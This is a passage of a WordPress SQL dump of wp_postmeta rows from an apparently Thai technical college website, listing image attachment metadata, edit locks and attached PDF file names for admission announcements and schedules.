;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27584, 11266, '_wp_attached_file', '2021/02/230264-04.jpg'),
(27585, 11266, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1240;s:6:\"height\";i:1754;s:4:\"file\";s:21:\"2021/02/230264-04.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"230264-04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"230264-04-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"230264-04-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"230264-04-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"230264-04-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27586, 11267, '_wp_attached_file', '2021/02/230264-02.jpg'),
(27587, 11267, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:843;s:6:\"height\";i:1192;s:4:\"file\";s:21:\"2021/02/230264-02.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"230264-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"230264-02-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"230264-02-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"230264-02-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"230264-02-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27588, 11258, '_thumbnail_id', '11265'),
(27591, 11258, '_hide_featured', NULL),
(27594, 11269, '_edit_lock', '1614067218:14'),
(27595, 11269, '_edit_last', '14'),
(27596, 11269, '_thumbnail_id', '11267'),
(27599, 11269, '_hide_featured', NULL),
(27602, 11271, '_edit_lock', '1614067128:14'),
(27603, 11271, '_edit_last', '14'),
(27604, 11271, '_thumbnail_id', '11264'),
(27607, 11271, '_hide_featured', NULL),
(27610, 11273, '_edit_lock', '1614067172:14'),
(27611, 11273, '_edit_last', '14'),
(27612, 11273, '_thumbnail_id', '11266'),
(27615, 11273, '_hide_featured', NULL),
(27618, 11275, '_edit_lock', '1614067224:14'),
(27619, 11275, '_edit_last', '14'),
(27620, 11275, '_thumbnail_id', '11263'),
(27623, 11275, '_hide_featured', NULL),
(27626, 11277, '_edit_lock', '1616556714:12'),
(27627, 11277, '_edit_last', '14'),
(27628, 11277, '_thumbnail_id', '11262'),
(27631, 11277, '_hide_featured', NULL),
(27634, 11279, '_edit_lock', '1616556738:12'),
(27635, 11279, '_edit_last', '14'),
(27636, 11279, '_thumbnail_id', '11261'),
(27639, 11279, '_hide_featured', NULL),
(27644, 11281, '_edit_lock', '1616556564:12'),
(27645, 11281, '_edit_last', '14'),
(27646, 11281, '_thumbnail_id', '11260'),
(27649, 11281, '_hide_featured', NULL),
(27652, 11283, '_edit_lock', '1616556539:12'),
(27653, 11283, '_edit_last', '14'),
(27654, 11283, '_thumbnail_id', '11259'),
(27657, 11283, '_hide_featured', NULL),
(27660, 11285, '_edit_lock', '1616556481:12'),
(27661, 11285, '_edit_last', '14'),
(27662, 11285, '_thumbnail_id', '11208'),
(27665, 11285, '_hide_featured', NULL),
(27670, 11290, '_wp_attached_file', '2021/02/ภายนอก.png'),
(27671, 11290, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:432;s:6:\"height\";i:216;s:4:\"file\";s:30:\"2021/02/ภายนอก.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"ภายนอก-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"ภายนอก-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"ภายนอก-400x200.png\";s:5:\"width\";i:400;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27672, 11291, '_wp_attached_file', '2021/02/Untitled-3.png'),
(27673, 11291, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:432;s:6:\"height\";i:216;s:4:\"file\";s:22:\"2021/02/Untitled-3.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-3-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"Untitled-3-400x200.png\";s:5:\"width\";i:400;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27674, 11292, '_wp_attached_file', '2021/02/230264.jpg'),
(27675, 11292, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:864;s:6:\"height\";i:216;s:4:\"file\";s:18:\"2021/02/230264.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"230264-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"230264-300x75.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"230264-768x192.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:18:\"230264-400x100.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27678, 11294, '_wp_attached_file', '2021/02/รายชื่อขึ้นทะเบียนเป็นนักศึกษาภายในรอบ8-1.pdf'),
(27679, 11295, '_wp_attached_file', '2021/02/รายชื่อขึ้นทะเบียนเป็นนักเรียนภายนอกรอบ.pdf'),
(27712, 11307, '_edit_lock', '1614073141:14'),
(27713, 11307, '_edit_last', '14'),
(27716, 11307, '_hide_featured', NULL),
(27729, 11310, '_edit_lock', '1614072995:14'),
(27730, 11310, '_edit_last', '14'),
(27731, 11311, '_wp_attached_file', '2021/02/รายชื่อขึ้นทะเบียนเป็นนักศึกษาภายในรอบ8-1-1.pdf'),
(27734, 11310, '_hide_featured', NULL),
(27737, 11313, '_edit_lock', '1614073062:14'),
(27738, 11313, '_edit_last', '14'),
(27741, 11313, '_hide_featured', NULL),
(27744, 11307, '_cg_img_link', '/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%82%e0%b8%b6%e0%b9%89%e0%b8%99%e0%b8%97%e0%b8%b0%e0%b9%80%e0%b8%9a-3/'),
(27745, 11307, '_cg_link_target', ''),
(27750, 11317, '_edit_lock', '1616556493:12'),
(27751, 11317, '_edit_last', '14'),
(27752, 11318, '_wp_attached_file', '2021/02/S__10027137.jpg'),
(27753, 11318, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1523;s:6:\"height\";i:1077;s:4:\"file\";s:23:\"2021/02/S__10027137.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"S__10027137-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"S__10027137-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"S__10027137-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"S__10027137-1024x724.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:23:\"S__10027137-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27754, 11317, '_thumbnail_id', '11318'),
(27757, 11317, '_hide_featured', NULL),
(27764, 11326, '_edit_lock', '1614767121:14'),
(27765, 11326, '_edit_last', '14'),
(27766, 11327, '_wp_attached_file', '2021/03/ประกาศรายชื่อขึ้นทะเบียนนักศึกษาโควตาขย.pdf'),
(27769, 11326, '_hide_featured', NULL),
(27772, 11329, '_wp_attached_file', '2019/12/Untitled-1-2.png'),
(27773, 11329, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:864;s:6:\"height\";i:216;s:4:\"file\";s:24:\"2019/12/Untitled-1-2.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Untitled-1-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"Untitled-1-2-300x75.png\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Untitled-1-2-768x192.png\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:24:\"Untitled-1-2-400x100.png\";s:5:\"width\";i:400;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27774, 11332, '_edit_lock', '1616215412:12'),
(27775, 11332, '_edit_last', '14'),
(27776, 11333, '_wp_attached_file', '2021/03/แผนรับ64-ปวส.-รอบปกติ.pdf'),
(27777, 11334, '_wp_attached_file', '2021/03/แผนรับ64-ปวช.-รอบปกติ.pdf'),
(27778, 11335, '_wp_attached_file', '2021/03/หลักเกณฑ์และแนวการปฏิบัติผู้ผ่านการสอบ2.pdf'),
(27779, 11336, '_wp_attached_file', '2021/03/หลักเกณฑ์และแนวการปฏิบัติผู้ผ่านการสอบ1.pdf'),
(27782, 11332, '_hide_featured', NULL),
(27787, 11338, '_edit_lock', '1614919919:14'),
(27788, 11338, '_edit_last', '14'),
(27791, 11338, '_hide_featured', NULL),
(27805, 11342, '_edit_lock', '1614839699:14'),
(27806, 11342, '_edit_last', '14'),
(27809, 11342, '_hide_featured', NULL),
(27814, 11344, '_wp_attached_file', '2019/12/messageImage_1614910880074.jpg'),
(27815, 11344, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2019;s:6:\"height\";i:2076;s:4:\"file\";s:38:\"2019/12/messageImage_1614910880074.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"messageImage_1614910880074-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"messageImage_1614910880074-292x300.jpg\";s:5:\"width\";i:292;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"messageImage_1614910880074-768x790.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:790;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"messageImage_1614910880074-996x1024.jpg\";s:5:\"width\";i:996;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"messageImage_1614910880074-292x300.jpg\";s:5:\"width\";i:292;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27816, 11346, '_wp_attached_file', '2021/03/หลักเกณฑ์และแนวการปฏิบัติผู้ผ่านการสอบ21.pdf'),
(27825, 11351, '_wp_attached_file', '2019/12/050364-01.jpg');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(27826, 11351, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2019;s:6:\"height\";i:2076;s:4:\"file\";s:21:\"2019/12/050364-01.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"050364-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"050364-01-292x300.jpg\";s:5:\"width\";i:292;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"050364-01-768x790.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:790;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"050364-01-996x1024.jpg\";s:5:\"width\";i:996;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"050364-01-292x300.jpg\";s:5:\"width\";i:292;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27845, 11359, '_edit_lock', '1616215449:12'),
(27846, 11359, '_edit_last', '14'),
(27849, 11359, '_hide_featured', NULL),
(27879, 11370, '_edit_lock', '1614934397:14'),
(27880, 11370, '_edit_last', '14'),
(27881, 11370, '_hide_featured', NULL),
(27882, 11372, '_edit_lock', '1614934421:14'),
(27883, 11372, '_edit_last', '14'),
(27884, 11372, '_hide_featured', NULL),
(27885, 11374, '_edit_lock', '1614935030:14'),
(27886, 11374, '_edit_last', '14'),
(27887, 11374, '_cg_img_link', '/%e0%b8%ab%e0%b8%a5%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%81%e0%b8%93%e0%b8%91%e0%b9%8c%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b9%81%e0%b8%99%e0%b8%a7%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%8e%e0%b8%b4%e0%b8%9a/'),
(27888, 11374, '_cg_link_target', ''),
(27889, 11374, '_hide_featured', NULL),
(27890, 11376, '_edit_lock', '1614934883:14'),
(27891, 11376, '_edit_last', '14'),
(27892, 11376, '_hide_featured', NULL),
(27893, 11382, '_wp_attached_file', '2019/12/050364-02.jpg'),
(27894, 11382, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:864;s:6:\"height\";i:144;s:4:\"file\";s:21:\"2019/12/050364-02.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"050364-02-150x144.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:144;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"050364-02-300x50.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"050364-02-768x128.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:128;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"050364-02-400x67.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:67;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27895, 11390, '_edit_lock', '1616488256:14'),
(27896, 11390, '_edit_last', '14'),
(27897, 11391, '_wp_attached_file', '2021/03/ปฏิทินปฏิบัติงานวิทยาลัยเทคนิคระยอง-ปีกา.pdf'),
(27898, 11390, '_hide_featured', NULL),
(27899, 11395, '_edit_lock', '1616488817:14'),
(27900, 11395, '_edit_last', '14'),
(27901, 11396, '_wp_attached_file', '2021/03/47121_21032314140441.pdf'),
(27904, 11395, '_hide_featured', NULL),
(27909, 11400, '_edit_lock', '1617285601:1'),
(27910, 11400, '_edit_last', '1'),
(27913, 11400, '_hide_featured', NULL),
(27914, 11404, '_wp_attached_file', '2019/12/Untitled-1-3.png'),
(27915, 11404, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:1181;s:4:\"file\";s:24:\"2019/12/Untitled-1-3.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Untitled-1-3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Untitled-1-3-300x101.png\";s:5:\"width\";i:300;s:6:\"height\";i:101;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Untitled-1-3-768x259.png\";s:5:\"width\";i:768;s:6:\"height\";i:259;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Untitled-1-3-1024x345.png\";s:5:\"width\";i:1024;s:6:\"height\";i:345;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:24:\"Untitled-1-3-400x135.png\";s:5:\"width\";i:400;s:6:\"height\";i:135;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27916, 11400, '_cg_img_link', 'https://bit.ly/3whfa8j'),
(27917, 11400, '_cg_link_target', ''),
(27920, 11408, '_wp_attached_file', '2021/03/167572564_3272977119472284_3527170553312477864_n.png'),
(27921, 11408, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:60:\"2021/03/167572564_3272977119472284_3527170553312477864_n.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"167572564_3272977119472284_3527170553312477864_n-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:60:\"167572564_3272977119472284_3527170553312477864_n-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:61:\"167572564_3272977119472284_3527170553312477864_n-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:61:\"167572564_3272977119472284_3527170553312477864_n-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:60:\"167572564_3272977119472284_3527170553312477864_n-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27922, 11409, '_wp_attached_file', '2021/03/167992512_3272977112805618_785362703025062137_n.png'),
(27923, 11409, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:59:\"2021/03/167992512_3272977112805618_785362703025062137_n.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"167992512_3272977112805618_785362703025062137_n-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"167992512_3272977112805618_785362703025062137_n-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:60:\"167992512_3272977112805618_785362703025062137_n-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"167992512_3272977112805618_785362703025062137_n-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:59:\"167992512_3272977112805618_785362703025062137_n-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27924, 11410, '_wp_attached_file', '2021/03/167393647_3272977089472287_8610582427784742156_n.png'),
(27925, 11410, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:60:\"2021/03/167393647_3272977089472287_8610582427784742156_n.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"167393647_3272977089472287_8610582427784742156_n-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:60:\"167393647_3272977089472287_8610582427784742156_n-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:61:\"167393647_3272977089472287_8610582427784742156_n-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:61:\"167393647_3272977089472287_8610582427784742156_n-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"